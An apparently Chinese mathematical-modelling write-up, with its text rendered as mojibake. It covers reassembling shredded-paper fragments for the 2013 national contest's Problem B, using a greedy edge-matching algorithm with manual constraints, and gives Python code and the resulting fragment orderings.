text
stringlengths 256
65.5k
|
|---|
åè¨ï¼ä¸å¹´åå½èµçæ¶åï¼å¾å级å°åäºä¸ä¸Bé¢ï¼åå®ä¹åè¿åäºä¸ªãç¢çº¸å¤åï¼ä¸ä¸ªäººçæ°å¦å»ºæ¨¡ãã彿¶å°±æ¯å¯¹é¢ç®å¾æå
´è¶£ï¼ç¶åéè¿ä¸å¤©çå¦ä¹ ï¼åºæ¬å®æäºéä»¶ä¸äºç代ç ï¼å¯¹éä»¶ä¸ä¹åªæ¯æä¸ªæ¦å¿µãèä»å¹´æä»¬ä¸çæ°å¦å»ºæ¨¡è¯¾ï¼è叿è¿éé¢ä½ä¸ºå¤§ä½ä¸è®©æä»¬åï¼äºæ¯æä¾¿åæ¾èµ·äºä¸å¹´åçé£ä»½æ¿æ
ï¼ç»§ç»é£æªå®æçä¸ä¸ªäººçæ°å¦å»ºæ¨¡...
ä¸å»å¹´ä¸åçæ¯ï¼è¿æ¬¡å°ææä»£ç ç¨Pythonå®ç°äºï¼æ´ç®æ´ï¼æ´æ¸ æ°ï¼çè³å¯è½æ´é«æ~~以䏿¯è®ºæå ¨æã
ç ç©¶èæ¯ #
2011å¹´10æ29æ¥ï¼ç¾å½å½é²é¨é«çº§ç 究计åå±ï¼DARPAï¼å®£å¸äºä¸åºç¢çº¸å¤åææèµï¼Shredder Challengeï¼ï¼æ¨å¨å¯»æ¾å°é«æææçç®æ³ï¼å¯¹ç¢çº¸æºå¤çåçç¢çº¸å±è¿è¡å¤åã[1]该ç«èµå¸å¼äºå ¨ç¾9000æ¯åèµéä¼åä¸è§éï¼ç»è¿ä¸ä¸ªå¤æçæ¶é´ï¼æä¸æ¯é伿å宿äºå®æ¹çé¢ç®ã
è¿å¹´æ¥ï¼ç¢çº¸å¤åææ¯æ¥çåå°éè§ï¼å®æ¾ç¤ºäºå¨ç¢çä¸âè¿åçç¸âçå¯è½æ§ï¼è¡¨ææä»¬å¯ä»¥ä»ä¸äºç ´ç¢ççæ®µä¸âè§£å¯âåºåå§ä¿¡æ¯æ¥ãå¦ä¸æ¹é¢ï¼è¯¥ææ¯ä¹åç §çå¤çé¢åä¸çâå ¨æ¯å¾æ¼æ¥ææ¯âæä¸å®èç³»ï¼è¯¥ææ¯æ¯æéè¿è¥å¹²å¼ ä¸åä¾§é¢çç §çï¼åæä¸å¼ 宿´çå ¨æ¯å¾ãå æ¤ï¼åæç ç©¶ç¢çº¸å¤åææ¯ï¼æçéè¦çæä¹ã
æ¬æä»¥2013å¹´å ¨å½å¤§å¦çæ°å¦å»ºæ¨¡ç«èµçBé¢ä¸ºå¥æºï¼åæ¥ç ç©¶äºä¸äºçæ³åçç¢çº¸ççå¤åï¼åºæ¬å®æäºå®æ¹ææä¾çç¢çº¸ççå¤åãæä»¬çç 究表æï¼å®æçæ³åçç¢çº¸çå¤åï¼å®å ¨æ¯æå¯è½çï¼å¹¶ä¸è½å¤å¨è¾å¿«çæ¶é´å 宿ã
çæ³åå设 #
æä»¬å设ç¢çº¸ç满足以ä¸ççæ³åå设ï¼
1ãæ¯å¼ ç¢çº¸ç齿¯å¤§å°ä¸æ ·çç©å½¢ï¼
2ã纸ççå岿¹å¼ä¸ºå¹³è¡åå²ï¼æ 徿ï¼
3ãç¢çº¸ç齿¯æ£é¢åä¸çï¼
4ãçº¸çæ ç¼ºå¤±åæ··æï¼å³ææç¢çè½å¤æ¼åæä¸å¼ 宿çåå¾
模åçå»ºç« #
å¨ä¸è¿°ççæ³åå设ä¹ä¸ï¼æä»¬å»ºç«äºç¢çº¸å¤åçæ°å¦æ¨¡åãå ¶ä¸ï¼æä»¬å©ç¨å¹¶æ¹è¿äºè´ªå¿ç®æ³ï¼å¹¶å¯¹å¹é ææ å人工干é¢è¿è¡äºåæã
çæ³åçå¾åç¢çæ¯ä¸ä¸ªç©å½¢ï¼å°å ¶åç´ åä¹åå°±æ¯ä¸ä¸ªåç´ ç©éµãä¸ºäºæ¯è¾ä¸¤å¼ ç¢çæ¯å¦ç¸é»ï¼æä»¬ä¸»è¦æ¯æ¯è¾ä¸¤è çè¾¹ç¼æ¯å¦å»åï¼ä¹å°±æ¯æ¯è¾åç´ ç©éµçè¾¹ç¼ååéçç¸ä¼¼æ§ãèå¨å¹é åº¦ææ è¿ä¸é®é¢ä¸ï¼æä»¬å¯¹ä¸¤ä¸ªä¸åçææ ââè·ç¦»åç¸å ³ç³»æ°ââè¿è¡äºæ¯è¾ï¼æç»éåäºè·ç¦»ä¸ºææ ãæåæä»¬é对éä»¶ä¸åéä»¶åçæ¼æ¥ï¼å å ¥äºä¸¤ç§äººå·¥å¹²é¢æ¨¡å¼ï¼ç»æè¡¨æè¿ä¸¤ç§å¹²é¢æ¨¡å¼å·¥ä½æ åµè¯å¥½ï¼ä½æ¯æå¾ è¿ä¸æ¥ä¼åã
éè¦è¯´æçè¯ï¼ä¸ºäºä¿è¯ç®æ³çéç¨èå´ï¼æä»¬å¹¶æ²¡æå°å¾åè¿è¡äºå¼åãè½ç¶å°±æ¬é¢èè¨ï¼äºå¼åç¢çå¾åè½è·å¾æ´ææçå¤çï¼ä½æ¯äºå¼åå¹¶ä¸éå大夿°ç±»åå¾çï¼è¿éçç±»åæçæ¯ç¢ççå 容ï¼ç¢çåæ ·è¦æ»¡è¶³çæ³åçå设ãï¼çå¤åå¤çãå æ¤ä¸ºäºè®©æä»¬çç®æ³æè¾å¤§çéç¨èå´ï¼æä»¬ç´æ¥å¤çåå¾åè䏿¯å 对å¾åè¿è¡äºå¼åã
è´ªå¿ç®æ³
å¨ç¢çº¸çå¹é ä¸ï¼æä»¬ä¸»è¦ç¨å°äºè´ªå¿ç®æ³ã主è¦çæ¥éª¤æ¯äººå·¥éæ©ä¸ä¸ªèµ·å§ç¢çä½ä¸ºèµ·ç¹ï¼ç¶åæè¿ä¸ªç¢çåç´ ç©éµçæå³è¾¹ç¼åéè·å ¶ä»ç¢ççæå·¦è¾¹ç¼åéè¿è¡æ¯è¾ï¼éæ©å¹é 度æé«çç¢çè¿è¡å¹é ï¼ç¶å以æ°å¹é å°çç¢ç为å¼å§ï¼å对ä½ä¸ç¢çè¿è¡æä¼å¹é ï¼ä»¥æ¤ç±»æ¨ã
è´ªå¿ç®æ³æ¯ä¸ç§å¯»æ±å±åæä¼ä»¥æ±è¾¾å°å ¨å±æä¼çç®æ³ï¼å®å ·ææäºç¼ç¨ãæçé«çç¹ç¹ã使¯ç±äºå®åªæ¯æ¯ä¸æ¥å¯»æ±å±é¨æä¼ï¼æä»¬æ æ³é¢æç»ææ¯å¦å ¨å±æä¼çãè¯¥ç®æ³å¨ç¢çº¸å¤åä¸ï¼å¯è½ä¼å¯¼è´ä¸¤ä¸ªå¼å¸¸ï¼
1ãä¸åçèµ·ç¹æ¼æ¥çç»æä¸åã
2ãå¨è¾¹ç¼ä¿¡æ¯è¾å°æ¶ï¼é¢ç¹åºç°å¹é é误ã
为äºï¼é¨åå°ï¼é¿å è´ªå¿ç®æ³ç缺ç¹ï¼æä»¬å¨äººå·¥å¹²é¢æ¹é¢å¯¹è´ªå¿ç®æ³è¿è¡äºæ¹è¿ãå½ç¶ï¼æµè¯è¡¨æéä»¶ä¸åäºä¸éè¦é¢å¤ç人工干é¢ï¼å æ¤æä»¬äººå·¥å¹²é¢åªé对éä»¶ä¸åéä»¶åè®¾è®¡ãæ¹è¿çå 容å°å¨$\ref{sec:rengongganyu}$详述ã
å¹é
度
å¦ä¸å¾æç¤ºï¼ä¸è¬æ¥è®²ï¼ä»å¾åçè¿éæ§èèï¼ç¸é»ç两个ç¢çº¸ççè¾¹ç¼åç´ åºå½æ¯ç¸ä¼¼ãçè³æ¯ç¸åçãè¿æ ·å¾å®¹æèæ³å°ä¸¤ä¸ªè¾¹ç¼çå¹é
ææ ä¸ºä¸¤ä¸ªåéçè·ç¦»ï¼
$$\begin{equation}d^2=|\boldsymbol{x}-\boldsymbol{y}|^2=\sum_{i=1}^{n}(x_i-y_i)^2\end{equation}$$
å¦æä¸¤ä¸ªè¾¹ç¼åéçè·ç¦»ä¸º0ï¼æä»¬æææ¡è¯´è¿ä¸¤ä¸ªç¢çæ¯å¹é
çã使¯å½ä¸¤ä¸ªåéè·ç¦»å¾å¤§æ¶ï¼æä»¬æå¤å¤§ææ¡è¯´è¿ä¸¤ä¸ªç¢çä¸å¹é
å¢ï¼æä»¬ç¥éï¼ä¸è¬çå¾åä¸ä»
ä»
å
·æè¿éæ§ï¼è¿å
·ææ¸åæ§ã对äºä¸å¼ ä¸è¬çå¾çæ¥è¯´ï¼ç¸é»ä¸¤ä¸ªååéå¯ä»¥è®¤ä¸ºæ¯çº¿æ§æ¸åçï¼è¿æ ·ä¸æ¥ï¼å¹é
度似ä¹ç¨â线æ§ç¸å
³æ§âè¡¡éæ´ä¸ºå¦¥å½ã线æ§ç¸å
³ç³»æ°[3]ç计ç®å
¬å¼ä¸ºï¼
$$\begin{equation}\rho_{X,Y}={\mathrm{cov}(X,Y) \over \sigma_X \sigma_Y} ={E[(X-\mu_X)(Y-\mu_Y)] \over \sigma_X\sigma_Y}\end{equation}$$
线æ§ç¸å ³ç³»æ°ç计ç®å ¬å¼æ¯è·ç¦»å ¬å¼å¤æå¾å¤ãæä»¬å¯¹åä¸ç»ç¢çéç¨ä¸¤ä¸ªææ è¿è¡æ¼æ¥æµè¯ï¼ç»è¿å¯¹ä¸åå 容ç¢ççæµè¯ï¼åç°æ»ä½æ¥è®²éç¨çº¿æ§ç¸å ³ç³»æ°çææä¼äºéç¨è·ç¦»å ¬å¼çææãç¶èï¼çº¿æ§ç¸å ³ç³»æ°çä¼å¿ä½ç°å¨ç §çå 容çç¢çº¸ï¼è¯¥ç¢ç为æä»¬éä¼èªè¡çæç¨æ¥æµè¯ç®æ³ãï¼å¤åä¸ï¼è对äºå®æ¹æä¾çæåå 容çç¢çº¸å¤åï¼ä¸¤è ææå¹¶æ ææ¾åºå«ãæç»ï¼ä»ç®åæ§èèï¼æä»¬éæ©äºåéçè·ç¦»ä½ä¸ºäºæä»¬çå¹é åº¦ææ ã
人工干é¢
æ¬è为éä»¶ä¸åéä»¶åè设计ãä¸ºäºæ¹ä¾¿äººå·¥å¹²é¢çè¿è¡ï¼æä»¬å¨æ¼æ¥ç¢çº¸ççæ¶åï¼å¨æ¯å¼ ç¢ç䏿 åºäºæä»¶åï¼ä½æ²¡æä¿®æ¹åæ¥çç¢çæä»¶ã
é¦å ï¼å¦æç´æ¥æéä»¶ä¸ãäºç代ç ç¨äºéä»¶ä¸ï¼ä¼åºç°ä¸é¢çææï¼å±é¨ï¼ï¼
ææçç¢çº¸çè¢«æ¼æäºä¸ä¸ªé¿æ¡ï¼é¿æ¡ä¸ææ¼æ¥æ£ç¡®çå°æ¹ï¼ä¹æä¸å°æ¼æ¥éè¯¯ãæ¢ä¸ªè§åº¦çï¼ç®åç¢çº¸çè¢«æ¼æäºä¸å ï¼å¤§æ¦20~30 个ï¼ç¨å¤§çç¢çåï¼ä¹å°±æ¯è¯´ï¼æä»¬å¯ä»¥æå·²ç»æ¼æ¥å¥½çç¡®å®ä¸æ¥ï¼ç¶åå对è¿äºç¢åè¿è¡æ¼æ¥ãè¿æ ·ä¸æ¥ï¼ä»200å¤ä¸ªç¢çååæäº20 å¤ä¸ªç¢çåï¼èªç¶å¤§å¤§åå°äºå·¥ä½éãè¿ééè¦äººå·¥ä»å¾çä¸è¾¨å«åºåªäºå·²ç»æ¼æ¥å¥½çï¼ç¶åè®°å½å°ä»£ç ä¹ä¸ãäºå®ä¸ï¼è¿å°±ç¸å½äºä¸ä¸ªäººå·¥èç±»çè¿ç¨ãï¼å¨è¿éï¼æä»¬å¹¶æ²¡æéç¨ç®æ³èªå¨èç±»ï¼å ·ä½åå å°å¨åé¢çå°é¾åæä¸è§£éãï¼
餿¤ä¹å¤ï¼æä»¬å¼å ¥äºâ人工æé¤âãå¨æä¸¤ä¸ªè·ç¦»å¾è¿çæ¶åï¼è´ªå¿ç®æ³å¯è½ä¼åºç°å¹é é误çç°è±¡ã使¯æä»¬å¿ 须认è¯å°è¿ç§æ åµä¸ä¼é¢ç¹åºç°ï¼å½è¾¹ç¼ä¿¡æ¯è¶³å¤æ¶ï¼æè å·²ç»å¯¹ç¢çè¿è¡äºèç±»ä¹åï¼å¹é é误æ¯ä¸ä¸ªä½æ¦ççäºæ ãå æ¤ï¼å妿们éè¿è§å¯åç°åºç°å¹é çé误æ¶ï¼å°±å¯ä»¥äººå·¥å°æé¤è¿ç§å¹é æ¹å¼ï¼ä½¿å¾ç¨åºå¨å©ä¸çå¹é æ¹æ¡ä¸éæ©æä¼çãæä»¬æçç±ç¸ä¿¡ï¼å¨æé次ï¼å¾å°æ¬¡ï¼çæé¤ä¹åï¼ä¼ä½¿å¾ç¨åºèªå¨å¹é å°æ£ç¡®çç¢çã
彿äºè¿ä¸æ¥çæ£ç¡®æ¼æ¥ä¿¡æ¯ä¹åï¼å¯ä»¥ç»§ç»ææ£ç¡®çæ¼æ¥è¡¥å å°ä»£ç ä¸ï¼ç¶åç»§ç»æé¤ãäººå·¥æ¼æ¥ãéå¤è¿ä¸ªè¿ç¨ï¼å°±è½å¤å¨âå¯ä»¥æ¥åçâæ¶é´å 宿ç¢çº¸çå¤åã
é®é¢æ±è§£ #
è¿éæä»¬æ±æ»æä»¬æå¾å°çæ±è§£ç»æã
éä»¶ä¸åéä»¶äº
è¿éåªä»¥éä»¶ä¸ä¸ºä¾åè¿è¡è¯´æãéä»¶ä¸çæ¼æ¥ä»£ç ä½äºéå½ä¸ãé¦å ï¼éææå®ä¸ä¸ªèµ·å§å¾çï¼å³ä»£ç ä¸ç$m$å¼ï¼ç¶åæ ¹æ®æ¼æ¥ç»æå¤æåºæ£ç¡®çèµ·å§å¾çï¼008.bmpï¼ï¼ç¶åä¿®æ¹$m$å¼ï¼éæ°åæ¼ä¸æ¬¡å³å¯ãæµè¯è¡¨æä¸éè¦é¢å¤ç人工干é¢å³å¯å®æãæç»å¾å°éä»¶ä¸çæ¼æ¥é¡ºåºä¸º
[8, 14, 12, 15, 3, 10, 2, 16, 1, 4, 5, 9, 13, 18, 11, 7, 17, 0, 6]
éä»¶äºçç¢çå¤åè¿ç¨è·éä»¶ä¸åºæ¬ä¸æ ·ï¼å¾å°éä»¶äºçæ¼æ¥é¡ºåºä¸ºï¼
[3, 6, 2, 7, 15, 18, 11, 0, 5, 1, 9, 13, 10, 8, 12, 14, 17, 16, 4]
éä»¶ä¸åéä»¶å
éä»¶ä¸ç代ç ç±éä»¶ä¸ç代ç ä¿®æ¹èæï¼ä¸»è¦æ¯å å ¥äºæä»¶åæ æ³¨ãäººå·¥æ¼æ¥å人工æé¤ä¸ä¸ªæ¹é¢çåè½ãç´æ¥è¿è¡æ¹ä»£ç ï¼å¾å°æ¼æ¥åºåï¼é¨åï¼
[14, 128, 3, 159, 82, 199, 7, 208, 29, 64, 111, 201, 5, 92, 180, 48, 37, 75, 38, 148, ...
è§å¯å¾ç¥ï¼[14, 128, 3, 159, 82, 199]è¿ä¸ªåºåæ¯æ¼æ¥æ£ç¡®çï¼[7, 208]æ¯æ¼æ¥æ£ç¡®çï¼[29, 64, 111, 201, 5, 92, 180, 48, 37, 75]乿¯æ¼æ¥æ£ç¡®çï¼ççãäºæ¯ä¾æ¬¡å¨ä»£ç çâknown=[[] for i in range(0,num)]âä¸ä¸è¡å å ¥ï¼
known[14] = [128, 3, 159, 82, 199] known[7] = [208] known[29] = [64, 111, 201, 5, 92, 180, 48, 37, 75] ...
å¹¶ä¸è§å¯å¾ç¥199åé¢å¹é 7æ¯é误çï¼208åé¢å¹é 29乿¯é误çï¼75åé¢ä¹ä¸è½å¹é 38ï¼å æ¤ï¼å¨âimpossible=[[] for i in range(0,num)]âä¸ä¸è¡å å ¥ï¼
impossible[199] = [7] impossible[208] = [29] impossible[75] = [38] ...
ä¿®æ¹å®æåï¼éæ°è¿è¡èæ¬ï¼å¾å°æ°çæ¼æ¥åºåãææ¼æ¥åºå䏿°å¢å çæ£ç¡®æ¹æ¡ï¼ä»¥å人工å¯ä»¥å®¹ææ¾å°çæ£ç¡®æ¹æ¡é½å å°knownéè¾¹å»ï¼æææ¾ç䏿£ç¡®æ¼æ¥é½å å ¥å°impossibleéè¾¹ãéå¤è¯¥æä½ãå¨ä¸¤ä¸ªå°æ¶å·¦å³çæ¶é´éï¼å¯ä»¥å®æé件䏿¯ä¸è¡çæ¼æ¥ãä¹å°±æ¯è¯´ï¼å æ¼å¥½æ¯ä¸è¡ï¼çææ¯ä¸è¡çå¾çï¼ç¶åè¿è¡çºµåçæ¼æ¥ã
åæ ·çåæ³å¯ä»¥å®æéä»¶åçæ¼æ¥ã
å°é¾åæ #
对äºéä»¶ä¸åéä»¶åçå¤åï¼æä»¬åç¨ä¸äºä¸¤ä¸ªåå°æ¶çæ¶é´ï¼éè¿ç®åçèªå¨èç±»ï¼å¯ä»¥ç¼©çç¨æ¶ï¼ä½ç»è®¡ç®åªè½æ¯å¸¸æ°çº§çä¼åãè¿è¡¨æç¢çº¸çèªå¨å¤åæ¯ä¸ä¸ªç¸å½å°é¾çé®é¢ãä¸é¢å°±æä»¬éçç ç©¶è¿ç¨ï¼åæè¯¥é®é¢çé¾åº¦æå¨ã
èç±»é¾ä»¥å¥æ
è½ç¶èç±»å¯ä»¥éä½é¨åå·¥ä½éï¼ä½å®é ä¸èç±»è½å¤èµ·å°çä½ç¨æ¯é常å°çã卿们ç代ç ä¸ï¼å³ä½¿æä»¬äººå·¥æ¾åºäºå¨åä¸è¡ç19个ç¢çï¼ç¶åç¨ç®æ³è¿è¡èªå¨æ¼æ¥ï¼æ¼æ¥ææä¹ä¸çæ³ï¼è¿æ¯ç±äºè¾¹ç¼ä¿¡æ¯è¿å°æå¼èµ·çåæï¼é¾ä»¥é¿å ã
å ¶æ¬¡ï¼èç±»å±éæ§å¤ªå¤§ãèµé¢çç¢çæ¯æç« åå²èæï¼æç« å ·ææ¯è¾ææ¾çè§å¾ï¼åå·ä¸æ ·ï¼è¡è·ä¸æ ·çï¼ï¼å æ¤æåæ³è¿è¡åæ¥çèç±»ãç¶èï¼å¯¹äºä¸è¬çç¢çï¼æ¯å¦ç §ççç¢çï¼å°±æ²¡æç±»ä¼¼çèç±»æ¹å¼ãå æ¤èç±»æ¯é¾ä»¥å¥æçãèç±»å¨æ¬é¢ä¸åªè½èµ·å°å¸¸æ°çº§ä¼åä½ç¨ã
纵åä¿¡æ¯é¾ä»¥å©ç¨
æä»¬éä¼å¨å®æéä»¶ä¸çæ¯ä¸è¡çæ¼æ¥åï¼å¾å°äº11个横åçåæ¡ã使¯å³ä½¿ä»¥è¿11个横ååæ¡ä¸ºåæï¼èªå¨æ¼æ¥è¿æ¯åºäºå¾å¤éè¯¯ï¼æ æ³èªå¨æ¼æ¥å®æãä¹å°±æ¯è¯´ï¼å³ä½¿å·²ç»å®æäºæ¯ä¸è¡çæ¼æ¥ï¼çºµåçè¾¹ç¼æè½å¤æä¾çä¿¡æ¯è¿æ¯ç¸å½å°ï¼å¦æä¸å¼å§å¨200å¤ä¸ªå°ç¢çæ¶å°±æ³å©ç¨çºµåä¿¡æ¯ï¼å 乿¯ä¸å¯è½çãå æ¤ï¼å ä¹å¯ä»¥è¯´ï¼å¨å®ææ¼æ¥çè¿ç¨ä¸ï¼åªææ¨ªåçä¿¡æ¯å¯ä»¥ä½¿ç¨ï¼è¿ä½¿å¾é¾åº¦å大ã
å车ä¹é´
ç¢çº¸å¤åæ¬èº«å°±æ¯ä¸ä¸ªç¸å½è°é¾çé®é¢ï¼æ¬æå¼å¤´ææå°çDARPAçç¢çº¸å¤åææèµï¼èå©çéä¼ä¹ç¨äºä¸ä¸ªå¤æçæ¶é´æå®æä»»å¡ã[4]è½ç¶ä¸¤ä¸ªé®é¢çé¾åº¦æ æ³ç¸æ¯å¹¶è®ºï¼ä½è¿ä¾§é¢è¯´æäºç¢çº¸å¤åçé¾åº¦ä¹å¤§ãå æ¤ï¼æ¬æå¤åé件䏿è±ç两个å¤å°æ¶ï¼åºè¯¥å±äºå¨åççæ¶é´ä¹å ã
æ¹è¿æ¹å #
æä»¬ææäºä¸ä¸ªæ¹è¿ç®æ³çæ¹åï¼ä½ç±äºæ¶é´éå¶ï¼æ æ³è¿è¡è¯¦ç»éªè¯ï¼ç®å论述å¦ä¸ã
人çèç¼å¤æä¸¤ä¸ªç¢çæ¯å¦ç¸é»æ¯æ¯è¾å®¹æçï¼è转åä¸ºè®¡ç®æºç®æ³åæ¯è¾å°é¾ãæä»¬æ³¨æå°ï¼å½æä»¬å¨è§å¯ä¸å¹ ç¢ççè¾¹ç¼çæ¶åï¼å¹¶éåªæ¯çè¾¹ç¼çä¸ä¸ªåç´ çï¼æä»¬èç¼å辨ç并没æè¿ä¹ç²¾ç»ï¼ï¼èæ¯çå°è¾¹ç¼çå ååç´ ç平忿ãå æ¤ï¼éè¦æ¹è¿çæ¯å¹é 度ä¸è½ä» 以边ç¼çä¸ååç´ è¿è¡è®¡ç®ï¼èåºå½ç»¼åèèè¾¹ç¼çå¤ååç´ ã
æ ¹æ®èç¼è¯å«çæè·¯ï¼æä»¬å¯ä»¥ç¨å¾åçè¿é度ä½ä¸ºå¹é åº¦çææ ãç¶èï¼å¾ççè¿éåº¦è¿æ²¡ææç¡®çå®ä¹ãå¦ä½æ ¹æ®å¤ååé夿å¾çæ¯å¦è¿éï¼è¿éè¦æ·±å ¥åæãä» ä»¥æ¤æç å¼çï¼æè¯»è ä¸åèµæã
åèæç® #
[1] æå£³ç½ï¼http://www.guokr.com/article/78259/
[2] ãç¦»æ£æ°å¦ç»æãï¼Bernard Kolmanç èï¼ç½å¹³ è¯
[3] ç®å°é积ç©ç¸å
³ç³»æ°ï¼http://zh.wikipedia.org/zh/ç®å°é积ç©ç¸å
³ç³»æ°
[4] Solidotï¼http://www.solidot.org/story?sid=27531
代ç å表 #
以ä¸ä»£ç çè¿è¡ç¯å¢ä¸ºPython 3.4ï¼Win32çæ¬ï¼éè¦å®è£ 对åºçNumpyåPillowåºã
éä»¶1å2ç代ç
import os
import numpy
from PIL import Image
#获å–当å‰ç›®å½•列表
images=os.listdir(os.getcwd())
images.remove('c.py') #脚本的文件å
num=len(images) #图片数目
hang=Image.open(images[0]).size[1] #图片高度
lie=Image.open(images[0]).size[0] #图片宽度
bianyuan=numpy.zeros((hang,2*num)) #矩阵用于储å˜è¾¹ç¼˜ä¿¡æ¯ã€‚
#打开图片,获å–边缘值。
for i in range(0,num):
img=Image.open(images[i])
bianyuan[:,2*i+1]=numpy.array(img)[:,0] #!!! 左边缘信æ¯ï¼Œæ”¾åˆ°å¥‡æ•°åˆ—
bianyuan[:,2*i]=numpy.array(img)[:,lie-1] #!!! å³è¾¹ç¼˜ä¿¡æ¯ï¼Œæ”¾åˆ°å¶æ•°åˆ—
#边缘值获å–完毕
i=0;m=31 #m是起始点
xulie=[m] #å‚¨å˜æ‹¼æŽ¥é¡ºåº
temp=[k for k in range(0,num)]
while i<num-1:
m1=temp[m]
temp.remove(temp[m])
bijiao=numpy.zeros(len(temp)) #用以比较矩阵
for j in range(0,len(temp)):
bijiao[j]=numpy.sum((bianyuan[:,2*m1]-bianyuan[:,2*temp[j]+1])**2) #æ¯ä¸ªå³è¾¹ç¼˜è·Ÿæ‰€æœ‰çš„左边缘比较
m=numpy.argmin(bijiao) #å·®åˆ«æœ€å°æ„味ç€å»åˆåº¦æœ€é«˜
xulie.append(temp[m])
i=i+1
print(xulie) #比较完æˆï¼Œè¾“出åºåˆ—
comb_img=Image.new ("RGBA", (lie*num, hang), (255, 0, 0)) #新图片,用æ¥åˆæˆ
j=0
for i in xulie:
img=Image.open(images[i])
region=img.crop((0,0,lie,hang))
comb_img.paste(region,(lie*j,0,lie*(j+1),hang))
j=j+1
comb_img.show()
éä»¶3å4ç代ç
import os
import numpy
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
#获å–当å‰ç›®å½•列表
images=os.listdir(os.getcwd())
images.remove('c.py')
num=len(images) #图片数目
hang=Image.open(images[0]).size[1] #图片高度
lie=Image.open(images[0]).size[0] #图片宽度
bianyuan=numpy.zeros((hang,2*num)) #矩阵用于储å˜è¾¹ç¼˜ä¿¡æ¯ã€‚
#打开图片,获å–边缘值。
for i in range(0,num):
img=Image.open(images[i])
bianyuan[:,2*i+1]=numpy.array(img)[:,0] #!!! 左边缘信æ¯ï¼Œæ”¾åˆ°å¥‡æ•°åˆ—
bianyuan[:,2*i]=numpy.array(img)[:,lie-1] #!!! å³è¾¹ç¼˜ä¿¡æ¯ï¼Œæ”¾åˆ°å¶æ•°åˆ—
#边缘值获å–完毕
known=[[] for i in range(0,num)] #已知的拼接
impossible=[[] for i in range(0,num)] #å¦å®šçš„æ‹¼æŽ¥
i=0;m=14 #m是起始点
m1=m
xulie=[m] #å‚¨å˜æ‹¼æŽ¥é¡ºåº
temp=[k for k in range(0,num)]
temp.remove(m1)
for kn in known:
for knn in kn:
try:
temp.remove(knn) #åˆ é™¤å·²çŸ¥æƒ…å†µ
except:pass
while i<num-1:
if len(known[m1]) != 0:
m2=0
for kn in known[m1]:
xulie.append(kn)
m2=kn
i=i+1
m1=m2
else:
temp1=temp[:]
for imp in impossible[m1]:
try:
temp.remove(imp)
except:pass
bijiao=numpy.zeros(len(temp)) #用以比较矩阵
for j in range(0,len(temp)):
bijiao[j]=numpy.sum((bianyuan[:,2*m1]-bianyuan[:,2*temp[j]+1])**2) #æ¯ä¸ªå³è¾¹ç¼˜è·Ÿæ‰€æœ‰çš„左边缘比较
m=numpy.argmin(bijiao) #å·®åˆ«æœ€å°æ„味ç€å»åˆåº¦æœ€é«˜
xulie.append(temp[m])
i=i+1
m1=temp[m]
temp=temp1[:]
temp.remove(m1) #过河拆桥
print(xulie) #比较完æˆï¼Œè¾“出åºåˆ—
#åŠ å…¥æ°´å°
myfont = ImageFont.truetype("C:\Windows\Fonts\simsun.ttc",36) #æ°´å°å—体与大å°
comb_img=Image.new ("RGBA", (lie*num, hang), (255, 0, 0)) #新图片,用æ¥åˆæˆ
j=0
for i in xulie:
img=Image.open(images[i])
d=ImageDraw.Draw(img) #åŠ å…¥æ°´å°
d.ink = 150 #æ°´å°é¢œè‰²
d.text((0,0),str(i),font=myfont) #åŠ å…¥æ°´å°
region=img.crop((0,0,lie,hang))
comb_img.paste(region,(lie*j,0,lie*(j+1),hang))
j=j+1
comb_img.show()
æåä¿®æ¹ç»æï¼éä»¶ä¸ï¼
known=[[] for i in range(0,num)] #å·²ç¥çæ¼æ¥
known[14]=[128, 3, 159, 82, 199, 135, 12, 73, 160, 203, 169, 134, 39, 31, 51, 107, 115, 176, 94]
known[94]=[34, 84, 183, 90, 47, 121, 42, 124, 144, 77, 112, 149, 97, 136, 164, 127, 58, 43, 7]
known[7]=[208, 138, 158, 126, 68, 175, 45, 174, 0, 137, 53, 56, 93, 153, 70, 166, 32, 196, 38]
known[38]=[148, 46, 161, 24, 35, 81, 189, 122, 103, 130, 193, 88, 167, 25, 8, 9, 105, 74, 168]
known[168]=[100, 76, 62, 142, 30, 41, 23, 147, 191, 50, 179, 120, 86, 195, 26, 1, 87, 18, 29]
known[29]=[64, 111, 201, 5, 92, 180, 48, 37, 75, 55, 44, 206, 10, 104, 98, 172, 171, 59, 61]
known[61]=[19, 78, 67, 69, 99, 162, 96, 131, 79, 63, 116, 163, 72, 6, 177, 20, 52, 36, 49]
known[49]=[54, 65, 143, 186, 2, 57, 192, 178, 118, 190, 95, 11, 22, 129, 28, 91, 188, 141, 125]
known[125]=[13, 182, 109, 197, 16, 184, 110, 187, 66, 106, 150, 21, 173, 157, 181, 204, 139, 145, 89]
known[89]=[146, 102, 154, 114, 40, 151, 207, 155, 140, 185, 108, 117, 4, 101, 113, 194, 119, 123]
known[71]=[156, 83, 132, 200, 17, 80, 33, 202, 198, 15, 133, 170, 205, 85, 152, 165, 27, 60]
impossible=[[] for i in range(0,num)] #å¦å®çæ¼æ¥
impossible[199]=[7,29,38,49,61,62,67,71,80,89,94,125]
impossible[1]=[146,129,102,134]
impossible[79]=[71,146,89,94]
impossible[123]=[94,125]
impossible[176]=[7]
impossible[13]=[135,94]
impossible[160]=[143,168,146,25,94,7,29,38,49]
impossible[95]=[168,129]
impossible[124]=[136,8,46,138,129]
impossible[58]=[161,46,182,83]
impossible[46]=[9]
impossible[97]=[144]
impossible[25]=[168]
æåä¿®æ¹ç»æï¼éä»¶åï¼
known=[[] for i in range(0,num)] #å·²ç¥çæ¼æ¥
known[20]=[41, 108, 116, 136, 73, 36, 207, 135, 15, 76, 43, 199, 45, 173, 79, 161, 179, 143, 86]
known[86]=[51, 107, 29, 40, 158, 186, 98, 24, 117, 150, 5, 59, 58, 92, 30, 37, 46, 127, 201]
known[201]=[148, 170, 196, 198, 94, 113, 164, 78, 103, 91, 80, 101, 26, 100, 6, 17, 28, 146,208]
known[208]=[21, 7, 49, 61, 119, 33, 142, 168, 62, 169, 54, 192, 133, 118, 189, 162, 197, 112,171]
known[171]=[42, 66, 205, 10, 157, 74, 145, 83, 134, 55, 18, 56, 35, 16, 9, 183, 152, 44, 132]
known[132]=[181, 95, 69, 167, 163, 166, 188, 111, 144, 206, 3, 130, 34, 13, 110, 25, 27, 178,70]
known[70]=[84, 60, 14, 68, 174, 137, 195, 8, 47, 172, 156, 96, 23, 99, 122, 90, 185,109,81]
known[81]=[77, 128, 200, 131, 52, 125, 140, 193, 87, 89, 48, 72, 12, 177, 124,0,102,115]
known[19]=[194, 93, 141, 88, 121, 126, 105, 155, 114, 176, 182, 151, 22, 57, 202, 71, 165,82]
